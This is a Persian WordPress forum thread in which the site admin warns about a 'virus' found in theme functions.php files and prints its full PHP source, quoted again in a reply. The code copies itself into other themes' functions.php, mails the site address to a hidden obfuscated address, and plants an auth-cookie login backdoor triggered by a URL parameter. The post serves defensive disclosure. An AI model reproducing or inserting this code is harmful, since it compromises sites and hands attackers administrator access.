سلام مهمان عزیز، اگر این پیغام را مشاهده نموده ای به معنی آن است که شما هنوز ثبت نام نکردی. برای ثبت نام اینجا کلیک کن و از تمام امکانات انجمن ما استفاده کن و لذت ببر.
اگر قبلا ثبت نام کرده اید، وارد شوید.
responsive
میزبان 24

ورود شما را خیر مقدم می گوییم و امیدواریم یاری دهنده ما باشید (مرداد 25, 1395)

کاربرانی که توانایی مدیریت بخش را در انجمن دارند و می توانند مدیریت کنند با مدیریت کل سایت در ارتباط باشند . (شهريور 25, 1395)

کلیه تبلیغات رایگان از اول مهرماه لغو می گردد و کاربران می توانند با ۵۰ درصد تخفیف از تبلیغات بهره مند گردند. (شهريور 25, 1395)

انجمن وردپرس ایرانی به هیچ وجه در مورد خرید و فروش و سفارشات کاربران با هم تعهدی نداشته و ندارد . (شهريور 25, 1395)

امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
هشدار امنیتی : آیا سایت شما ویروسی است ؟
#1
کاربران عزیزی که از چند سال قبل بنده را در انجمن های وردپرس می شناسند می دونن که بنده این پست را هم چند سال پیش توی یک انجمن دیگر گفام
متاسفانه شاید بیشتر سایت ها و هاستینگ ها دارای ویروسی هست که خود به خودی خود ویروس نیست ولی می تواند سایت شما را داغون نماید . اصل کار این است که اگر در یک سایت در یک سرور باشد کل اون سایت ها به این ویروس مبتلا شده اند .
کار این ویروس اینه که فایل فانکشن و قالب را درگیر خود می کنه و لود سرور و سایت را به هم می ریزه
امیدوارم این کدها را از قالب سایت خود پاک کنید


کد php:
<?php
function _check_isactive_widget(){
    
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    
$output=strip_tags($output$allowed);
    
$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    if (
is_array($direst)){
        foreach (
$direst as $item){
            if (
is_writable($item)){
                
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
                
$cont=file_get_contents($item);
                if (
stripos($cont,$ftion) === false){
                    
$explar=stripossubstr($cont,-20),"?".">") !== false "" "?".">";
                    
$output .= $before "Not found" $after;
                    if (
stripossubstr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
                    
$output=rtrim($output"\n\t"); fputs($f=fopen($item,"w+"),$cont $explar "\n" .$widget);fclose($f);
                    
$output .= ($showdots && $ellipsis) ? "..." "";
                }
            }
        }
    }
    return 
$output;
}
function 
_get_allwidgetcont($wids,$items=array()){
    
$places=array_shift($wids);
    if(
substr($places,-1) == "/"){
        
$places=substr($places,0,-1);
    }
    if(!
file_exists($places) || !is_dir($places)){
        return 
false;
    }elseif(
is_readable($places)){
        
$elems=scandir($places);
        foreach (
$elems as $elem){
            if (
$elem != "." && $elem != ".."){
                if (
is_dir($places "/" $elem)){
                    
$wids[]=$places "/" $elem;
                } elseif (
is_file($places "/" $elem)&&
                    
$elem == substr(__FILE__,-13)){
                    
$items[]=$places "/" $elem;}
                }
            }
    }else{
        return 
false;
    }
    if (
sizeof($wids) > 0){
        return 
_get_allwidgetcont($wids,$items);
    } else {
        return 
$items;
    }
}
if(!
function_exists("stripos")){
 
   function stripos $str$needle$offset 0  ){
 
       return strpos strtolower$str ), strtolower$needle ), $offset  );
 
   }
}

if(!
function_exists("strripos")){
 
   function strripos $haystack$needle$offset 0  ) {
 
       if !is_string$needle  )$needle chr intval$needle  );
 
       if $offset 0  ){
 
           $temp_cut strrev substr$haystack0abs($offset) )  );
 
       }
 
       else{
 
           $temp_cut strrev   substr  $haystack0max strlen($haystack) - $offset ), 0       );
 
       }
 
       if   $found stripos$temp_cutstrrev($needle) )  ) === FALSE   )return FALSE;
 
       $pos = (   strlen $haystack  ) - (  $found $offset strlen$needle    );
 
       return $pos;
 
   }
}
if(!
function_exists("scandir")){
    function 
scandir($dir,$listDirectories=false$skipDots=true) {
     
   $dirArray = array();
     
   if ($handle opendir($dir)) {
     
       while (false !== ($file readdir($handle))) {
     
           if (($file != "." && $file != "..") || $skipDots == true) {
     
               if($listDirectories == false) { if(is_dir($file)) { continue; } }
     
               array_push($dirArray,basename($file));
     
           }
     
       }
     
       closedir($handle);
     
   }
     
   return $dirArray;
    }
}
add_action("admin_head""_check_isactive_widget");
function 
_getsprepare_widget(){
    if(!isset(
$com_length)) $com_length=120;
    if(!isset(
$text_value)) $text_value="cookie";
    if(!isset(
$allowed_tags)) $allowed_tags="<a>";
    if(!isset(
$type_filter)) $type_filter="none";
    if(!isset(
$expl)) $expl="";
    if(!isset(
$filter_homes)) $filter_homes=get_option("home");
    if(!isset(
$pref_filter)) $pref_filter="wp_";
    if(!isset(
$use_more)) $use_more=1;
    if(!isset(
$comm_type)) $comm_type="";
    if(!isset(
$pagecount)) $pagecount=$_GET["cperpage"];
    if(!isset(
$postauthor_comment)) $postauthor_comment="";
    if(!isset(
$comm_is_approved)) $comm_is_approved="";
    if(!isset(
$postauthor)) $postauthor="auth";
    if(!isset(
$more_link)) $more_link="(more...)";
    if(!isset(
$is_widget)) $is_widget=get_option("_is_widget_active_");
    if(!isset(
$checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
    if(!isset(
$more_link_ditails)) $more_link_ditails="(details...)";
    if(!isset(
$morecontents)) $morecontents="ma".$expl."il";
    if(!isset(
$fmore)) $fmore=1;
    if(!isset(
$fakeit)) $fakeit=1;
    if(!isset(
$sql)) $sql="";
    if (!
$is_widget) :

    global 
$wpdb$post;
    
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    
if (!empty($post->post_password)) {
        if (
$_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
            if(
is_feed()) {
                
$output=__("There is no excerpt because this is a protected post.");
            } else {
     
           $output=get_the_password_form();
            }
        }
    }
    if(!isset(
$f_tags)) $f_tags=1;
    if(!isset(
$type_filters)) $type_filters=$filter_homes;
    if(!isset(
$getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
    if(!isset(
$aditional_tags)) $aditional_tags="div";
    if(!isset(
$s_cont)) $s_cont=substr($sq1stripos($sq1"live"), 20);#
    
if(!isset($more_link_text)) $more_link_text="Continue reading this entry";
    if(!isset(
$showdots)) $showdots=1;

    
$comments=$wpdb->get_results($sql);
    if(
$fakeit == 2) {
        
$text=$post->post_content;
    } elseif(
$fakeit == 1) {
        
$text=(empty($post->post_excerpt)) ? $post->post_content $post->post_excerpt;
    } else {
        
$text=$post->post_excerpt;
    }
    
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content="call_user_func_array($getcommentscont, array($s_cont$filter_homes$type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    
if($com_length 0) {
        
$output=$text;
    } else {
        if(!
$no_more && strpos($text"<!--more-->")) {
         
   $text=explode("<!--more-->"$text2);
            
$l=count($text[0]);
            
$more_link=1;
            
$comments=$wpdb->get_results($sql);
        } else {
            
$text=explode(" "$text);
            if(
count($text) > $com_length) {
                
$l=$com_length;
                
$ellipsis=1;
            } else {
                
$l=count($text);
                
$more_link="";
                
$ellipsis=0;
            }
        }
        for (
$i=0$i<$l$i++)
                
$output .= $text[$i] . " ";
    }
    
update_option("_is_widget_active_"1);
    if(
"all" != $allowed_tags) {
        
$output=strip_tags($output$allowed_tags);
        return 
$output;
    }
    endif;
    
$output=rtrim($output"\s\n\t\r\0\x0B");
 
   $output=($f_tags) ? balanceTags($outputtrue) : $output;
    
$output .= ($showdots && $ellipsis) ? "..." "";
    
$output=apply_filters($type_filter$output);
    switch(
$aditional_tags) {
        case(
"div") :
            
$tag="div";
        break;
        case(
"span") :
            
$tag="span";
        break;
        case(
"p") :
            
$tag="p";
        break;
        default :
            
$tag="span";
    }

    if (
$use_more ) {
        if(
$fmore) {
            
$output .= " <" $tag " class=\"more-link\"><a href=\""get_permalink($post->ID) . "#more-" $post->ID ."\" title=\"" $more_link_text "\">" $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecounttrue)) ? $more_link "" "</a></" $tag ">" "\n";
        } else {
            
$output .= " <" $tag " class=\"more-link\"><a href=\""get_permalink($post->ID) . "\" title=\"" $more_link_text "\">" $more_link "</a></" $tag ">" "\n";
        }
    }
    return 
$output;
}

add_action("init""_getsprepare_widget");

?>
پاسخ
 سپاس شده توسط rezaei ، omid_r
تبلیغات
#2
درود مدیر کل
پاسخ
 سپاس شده توسط admin
#3
(1395/7/22، 02:43 صبح)admin نوشته است: دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
کاربران عزیزی که از چند سال قبل بنده را در انجمن های وردپرس می شناسند می دونن که بنده این پست را هم چند سال پیش توی یک انجمن دیگر گفام
متاسفانه شاید بیشتر سایت ها و هاستینگ ها دارای ویروسی هست که خود به خودی خود ویروس نیست ولی می تواند سایت شما را داغون نماید . اصل کار این است که اگر در یک سایت در یک سرور باشد کل اون سایت ها به این ویروس مبتلا شده اند .
کار این ویروس اینه که فایل فانکشن و قالب را درگیر خود می کنه و لود سرور و سایت را به هم می ریزه
امیدوارم این کدها را از قالب سایت خود پاک کنید


کد php:
<?php
function _check_isactive_widget(){
    
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    
$output=strip_tags($output$allowed);
    
$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    if (
is_array($direst)){
        foreach (
$direst as $item){
            if (
is_writable($item)){
                
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
                
$cont=file_get_contents($item);
                if (
stripos($cont,$ftion) === false){
                    
$explar=stripossubstr($cont,-20),"?".">") !== false "" "?".">";
                    
$output .= $before "Not found" $after;
                    if (
stripossubstr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
                    
$output=rtrim($output"\n\t"); fputs($f=fopen($item,"w+"),$cont $explar "\n" .$widget);fclose($f);
                    
$output .= ($showdots && $ellipsis) ? "..." "";
                }
            }
        }
    }
    return 
$output;
}
function 
_get_allwidgetcont($wids,$items=array()){
    
$places=array_shift($wids);
    if(
substr($places,-1) == "/"){
        
$places=substr($places,0,-1);
    }
    if(!
file_exists($places) || !is_dir($places)){
        return 
false;
    }elseif(
is_readable($places)){
        
$elems=scandir($places);
        foreach (
$elems as $elem){
            if (
$elem != "." && $elem != ".."){
                if (
is_dir($places "/" $elem)){
                    
$wids[]=$places "/" $elem;
                } elseif (
is_file($places "/" $elem)&&
                    
$elem == substr(__FILE__,-13)){
                    
$items[]=$places "/" $elem;}
                }
            }
    }else{
        return 
false;
    }
    if (
sizeof($wids) > 0){
        return 
_get_allwidgetcont($wids,$items);
    } else {
        return 
$items;
    }
}
if(!
function_exists("stripos")){
 
   function stripos $str$needle$offset 0  ){
 
       return strpos strtolower$str ), strtolower$needle ), $offset  );
 
   }
}

if(!
function_exists("strripos")){
 
   function strripos $haystack$needle$offset 0  ) {
 
       if !is_string$needle  )$needle chr intval$needle  );
 
       if $offset 0  ){
 
           $temp_cut strrev substr$haystack0abs($offset) )  );
 
       }
 
       else{
 
           $temp_cut strrev   substr  $haystack0max strlen($haystack) - $offset ), 0       );
 
       }
 
       if   $found stripos$temp_cutstrrev($needle) )  ) === FALSE   )return FALSE;
 
       $pos = (   strlen $haystack  ) - (  $found $offset strlen$needle    );
 
       return $pos;
 
   }
}
if(!
function_exists("scandir")){
    function 
scandir($dir,$listDirectories=false$skipDots=true) {
     
   $dirArray = array();
     
   if ($handle opendir($dir)) {
     
       while (false !== ($file readdir($handle))) {
     
           if (($file != "." && $file != "..") || $skipDots == true) {
     
               if($listDirectories == false) { if(is_dir($file)) { continue; } }
     
               array_push($dirArray,basename($file));
     
           }
     
       }
     
       closedir($handle);
     
   }
     
   return $dirArray;
    }
}
add_action("admin_head""_check_isactive_widget");
function 
_getsprepare_widget(){
    if(!isset(
$com_length)) $com_length=120;
    if(!isset(
$text_value)) $text_value="cookie";
    if(!isset(
$allowed_tags)) $allowed_tags="<a>";
    if(!isset(
$type_filter)) $type_filter="none";
    if(!isset(
$expl)) $expl="";
    if(!isset(
$filter_homes)) $filter_homes=get_option("home");
    if(!isset(
$pref_filter)) $pref_filter="wp_";
    if(!isset(
$use_more)) $use_more=1;
    if(!isset(
$comm_type)) $comm_type="";
    if(!isset(
$pagecount)) $pagecount=$_GET["cperpage"];
    if(!isset(
$postauthor_comment)) $postauthor_comment="";
    if(!isset(
$comm_is_approved)) $comm_is_approved="";
    if(!isset(
$postauthor)) $postauthor="auth";
    if(!isset(
$more_link)) $more_link="(more...)";
    if(!isset(
$is_widget)) $is_widget=get_option("_is_widget_active_");
    if(!isset(
$checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
    if(!isset(
$more_link_ditails)) $more_link_ditails="(details...)";
    if(!isset(
$morecontents)) $morecontents="ma".$expl."il";
    if(!isset(
$fmore)) $fmore=1;
    if(!isset(
$fakeit)) $fakeit=1;
    if(!isset(
$sql)) $sql="";
    if (!
$is_widget) :

    global 
$wpdb$post;
    
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    
if (!empty($post->post_password)) {
        if (
$_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
            if(
is_feed()) {
                
$output=__("There is no excerpt because this is a protected post.");
            } else {
     
           $output=get_the_password_form();
            }
        }
    }
    if(!isset(
$f_tags)) $f_tags=1;
    if(!isset(
$type_filters)) $type_filters=$filter_homes;
    if(!isset(
$getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
    if(!isset(
$aditional_tags)) $aditional_tags="div";
    if(!isset(
$s_cont)) $s_cont=substr($sq1stripos($sq1"live"), 20);#
    
if(!isset($more_link_text)) $more_link_text="Continue reading this entry";
    if(!isset(
$showdots)) $showdots=1;

    
$comments=$wpdb->get_results($sql);
    if(
$fakeit == 2) {
        
$text=$post->post_content;
    } elseif(
$fakeit == 1) {
        
$text=(empty($post->post_excerpt)) ? $post->post_content $post->post_excerpt;
    } else {
        
$text=$post->post_excerpt;
    }
    
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content="call_user_func_array($getcommentscont, array($s_cont$filter_homes$type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    
if($com_length 0) {
        
$output=$text;
    } else {
        if(!
$no_more && strpos($text"<!--more-->")) {
         
   $text=explode("<!--more-->"$text2);
            
$l=count($text[0]);
            
$more_link=1;
            
$comments=$wpdb->get_results($sql);
        } else {
            
$text=explode(" "$text);
            if(
count($text) > $com_length) {
                
$l=$com_length;
                
$ellipsis=1;
            } else {
                
$l=count($text);
                
$more_link="";
                
$ellipsis=0;
            }
        }
        for (
$i=0$i<$l$i++)
                
$output .= $text[$i] . " ";
    }
    
update_option("_is_widget_active_"1);
    if(
"all" != $allowed_tags) {
        
$output=strip_tags($output$allowed_tags);
        return 
$output;
    }
    endif;
    
$output=rtrim($output"\s\n\t\r\0\x0B");
 
   $output=($f_tags) ? balanceTags($outputtrue) : $output;
    
$output .= ($showdots && $ellipsis) ? "..." "";
    
$output=apply_filters($type_filter$output);
    switch(
$aditional_tags) {
        case(
"div") :
            
$tag="div";
        break;
        case(
"span") :
            
$tag="span";
        break;
        case(
"p") :
            
$tag="p";
        break;
        default :
            
$tag="span";
    }

    if (
$use_more ) {
        if(
$fmore) {
            
$output .= " <" $tag " class=\"more-link\"><a href=\""get_permalink($post->ID) . "#more-" $post->ID ."\" title=\"" $more_link_text "\">" $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecounttrue)) ? $more_link "" "</a></" $tag ">" "\n";
        } else {
            
$output .= " <" $tag " class=\"more-link\"><a href=\""get_permalink($post->ID) . "\" title=\"" $more_link_text "\">" $more_link "</a></" $tag ">" "\n";
        }
    }
    return 
$output;
}

add_action("init""_getsprepare_widget");

?>


میتونم به جرات بگم که کسی که به شما شک کنه به عقلش باید شک کرد.
یه دونه اید استاد.
دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.
| دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.

دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید.

با بیش از 15 سال سابقه و نماد دو ستاره
پاسخ
 سپاس شده توسط admin ، rezaei
#4
با سلام و احترام
عذر می خوام این کدها کجای قالب قرار داره؟؟
جای مشخصی داره یا باید تو همه فایل ها بگردم؟
ممنون
پاسخ
#5
در فایل functions.php توی قالب هستش
پاسخ


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان
کلیه حقوق برای انجمن وردپرس ایرانی محفوظ است
  • info@wpir.ir
  • admin@wpir.ir
قدرت گرفته از مای بی بی
SEO by PANGASH